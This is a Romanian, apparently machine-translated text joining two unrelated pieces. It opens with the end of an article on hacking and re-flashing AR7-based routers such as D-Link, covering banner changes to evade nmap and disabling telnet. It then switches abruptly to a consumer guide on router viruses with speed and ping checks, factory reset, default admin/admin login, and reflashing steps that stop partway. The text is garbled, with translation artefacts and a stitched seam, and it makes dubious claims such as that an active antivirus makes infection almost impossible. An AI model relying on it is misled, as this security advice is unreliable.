lung (limită de 8 caractere), schimbați bannere și felicitări de serviciu
(editor hexadecimal sau, de preferință, programe de recompilare) în ordine
nmap sau alte scanere nu au putut determina versiunile serviciului.
Ar trebui să schimbați și porturile de care atârnă demonii. Acest lucru este realizat de
modificări la progdefs.xml. Omorâți telnetul (cel mai ușor mod de a ghici parola, da
iar protocolul este neprotejat, de ce avem nevoie), activați firewall-ul, permiteți conexiunea
accesați serviciile numai de la propria dumneavoastră adresă IP sau MAC. Utilizați și un firewall
pentru a proteja o rețea sau un computer, nu degeaba este prezent. Configurare inteligentă
regulile te vor ajuta întotdeauna să te protejezi.
Concluzie
Multe, nu numai routerele D-Link și alte dispozitive similare sunt construite pe care
Cipul AR7, lista include Acorp, NetGear, Linksys, Actionec... Destul
Acest AR7 este popular împreună cu MontaVista. Rezultă că, folosind același
toolchain, puteți efectua fără probleme pașii descriși în articol.
Gândește-te bine: pe lângă acțiunile dăunătoare, poți să faci și ceva util/plăcut pentru tine
și altele (nu mă cert, plăcerea de a hacking nu poate fi înlocuită, dar totuși).
Vă puteți crea propriul firmware, de exemplu, routere mai puternice care pot
descărcați/distribuiți torrente... Toate modelele au interfață USB 1.1, dar la cele mai tinere
modele nu este lipit. Adăugați un modul USB și un driver de sistem de fișiere la kernel,
echipeaza routerul cu memorie Flash - si in final primesti un fel de stocare in retea pt
bani mici. Există o mulțime de opțiuni, dar ideile ar trebui să apară în mii - nu
limitează-te, creează și creează!
Problemele la distribuirea Wi-Fi folosind un router apar din diverse motive. Una dintre ele este infectarea dispozitivului de distribuție cu un virus, de care puteți scăpa singur.
- un virus care încetinește viteza Internetului în diferite moduri. De exemplu, un astfel de software rău intenționat încurcă setările firmware-ului sau începe să descarce conținut viruși publicitar pe computer;
- un virus care înlocuiește adresele site-urilor web. Arata cam asa: un utilizator merge pe orice site sigur cunoscut, iar virusul schimba DNS-ul in asa fel incat utilizatorul ajunge pe un site de publicitate sau vede bannere publicitare in care proprietarii site-ului nu le-au plasat. Un astfel de virus este și periculos, deoarece vă poate redirecționa către un site care conține alți viruși.
În orice caz, dacă observi că routerul tău nu funcționează corect, ar trebui să-l verifici pentru viruși, mai ales că este foarte ușor să scapi de ei.
Cum intră un virus într-un router?
Routerul oferă internet tuturor dispozitivelor conectate la acesta. Aceasta înseamnă că toate dispozitivele și routerul însuși se află în aceeași rețea de acasă. De asta profită virusul: ajunge pe computer de pe un site sau fișier descărcat și apoi este transmis prin rețea către router, unde începe să joace trucuri murdare. Procesul depinde de modelul virusului, de exemplu, unele programe malware nu se detectează în mod specific pe computer, ci încep să acționeze numai odată ce intră în router, în timp ce altele reușesc să dăuneze atât sistemului de operare, cât și firmware-ului routerului la acelasi timp.
Verificarea routerului
Înainte de a vă curăța routerul de viruși, trebuie să verificați dacă există pe el. Pentru a afla rezultatul, trebuie să utilizați Internetul direct prin computer. Adică, scoateți cablul sau modemul WLAN din router și introduceți-l în portul computerului, apoi urmați acești pași:
Dacă aveți probleme cu viteza, urmați acești trei pași.
- Verificați viteza internetului. Acest lucru trebuie făcut pentru a afla pe viitor dacă viteza este aceeași atunci când se utilizează rețeaua direct și printr-un router. De exemplu, puteți descărca un fișier sau puteți utiliza serviciul online special Speedtest.
Scanăm viteza internetului prin intermediul site-ului Speedtest
- Pentru a determina mai precis calitatea semnalului, trebuie să aflați indicatorul ping. Ping este timpul necesar pentru ca un semnal să fie trimis de pe dispozitivul dvs., să ajungă la server și să se întoarcă înapoi. Desigur, cu cât este mai mare, cu atât este mai rău pentru tine. Deschideți o linie de comandă, introduceți comanda ping ip și rulați-o. Adresa IP a conexiunii dvs., implicit este de obicei 192.168.0.1, dar poate varia. Amintiți-vă rezultatul. O valoare ping normală de până la 40 ms este un indicator excelent, 40–110 ms este o valoare medie normală, mai mult de 110 ms - merită să vă gândiți la reconfigurarea rețelei, la îmbunătățirea semnalului sau la schimbarea furnizorului.
Executați comanda ping ip
- După lista de pachete trimise, veți vedea statistici. Vă interesează linia „Pachete”, aceasta calculează câte pachete au fost trimise, pierdute, completate. Dacă numărul de pachete pierdute depășește 5%, trebuie să aflați care este problema. Dacă un număr mare de pachete nu ajung la server sau nu se întorc, acest lucru va afecta foarte mult viteza Internetului.
Să vedem ce procent de pachete se pierd
După ce ați parcurs toți pașii de mai sus, obțineți informații detaliate despre ping, numărul de pachete pierdute și viteza Internetului, reconectați cablul WLAN sau modemul la router și verificați toți aceiași indicatori atunci când vă conectați prin Wi-Fi. Dacă parametrii sunt aproximativ la același nivel, atunci problema nu se află în router, poate că motivul este de partea operatorului. În caz contrar, dacă apar probleme cu Internetul numai atunci când îl utilizați printr-un router, trebuie să resetați setările și să îl curățați de viruși.
Îndepărtarea virusului
Pentru a elimina virusul, trebuie să resetați setările la valorile implicite. Dacă virusul a reușit să deterioreze firmware-ul, va trebui să îl instalați din nou singur.
Reseteaza setarile
- Găsiți butonul Reset de pe spatele routerului. De obicei este mai mic decât toate celelalte. Trebuie apăsat timp de 10-15 secunde. Când routerul se oprește și începe să repornească, îl puteți elibera. Repornirea routerului vă va anunța că setările au fost resetate. Vă rugăm să rețineți că parola pe care ați setat-o se va pierde și ea.
Apăsați butonul Resetare
- Pentru a reconfigura routerul, trebuie să-l conectați la computer prin cablu, apoi deschideți browserul și accesați http://192.168.0.1. Poate că adresa va fi diferită, o puteți găsi pe un autocolant situat pe router în sine, sau în documentația livrată cu routerul. Vi se va cere un login și o parolă, în mod implicit autentificarea este admin, iar parola este admin sau 12345. Mai multe detalii sunt descrise în instrucțiunile pentru router.
- Accesați Configurare rapidă. Specificați opțiunile care vi se potrivesc. Dacă doriți, setați o parolă și schimbați numele rețelei. După finalizarea procedurii de configurare, salvați modificările și reporniți routerul.
Accesați secțiunea „Configurare rapidă” și setați setări convenabile
După parcurgerea tuturor pașilor de mai sus, verificați dacă ați scăpat de eroare. Dacă nu, va trebui să reîncărcați manual routerul.
Reflarea routerului
Firmware-ul routerului este posibil numai dacă dispozitivul este conectat la computer printr-un cablu. Nu puteți actualiza firmware-ul prin Wi-Fi.
- Există un autocolant pe spatele routerului. Găsiți modelul de router pe el. De asemenea, conține informații despre versiunea de firmware instalată inițial. Dacă versiunea sa este 7, atunci este mai bine să instalați actualizarea pentru versiunea 7 pentru a evita un conflict între firmware-ul prea nou și hardware-ul vechi al routerului.
Aflați versiunea de firmware și modelul de router
- Accesați site-ul web al producătorului și utilizați bara de căutare pentru a găsi versiunea corectă pentru modelul dvs. Descărcați-l pe computer.
Găsiți și descărcați versiunea de firmware necesară
- Fișierul descărcat va fi arhivat. Extrageți conținutul acestuia în orice folder convenabil.
Cum să vă protejați routerul de viruși în viitor
Singura modalitate de a vă proteja routerul de viruși este să îi împiedicați să pătrundă în computer. Computerul dumneavoastră este protejat folosind un antivirus. Instalați și în niciun caz nu dezactivați niciun antivirus modern. Este aproape imposibil să prindeți software rău intenționat cu un antivirus activat. Nici măcar nu este necesar să folosiți programe de securitate plătite în zilele noastre, sunt suficiente analogi gratuite de înaltă calitate.
Ce să faci dacă nimic nu ajută
Dacă respectarea tuturor instrucțiunilor de mai sus nu a adus rezultatul dorit, mai sunt două opțiuni: problema apare din cauza unei defecțiuni a părții fizice a routerului sau a erorilor din partea furnizorului. În primul rând, ar trebui să sunați la compania care vă furnizează internetul și să le spuneți despre problema dvs. și despre metodele care nu au ajutat la rezolvarea acesteia. În al doilea rând, routerul trebuie dus la un service special, astfel încât să poată fi examinat de specialiști.
Infectarea unui router cu un virus este o întâmplare rară, dar periculoasă. Există două moduri de a scăpa de virus: prin resetarea setărilor și actualizarea firmware-ului. De asemenea, trebuie să vă asigurați că nu rămâne niciun malware pe computer.
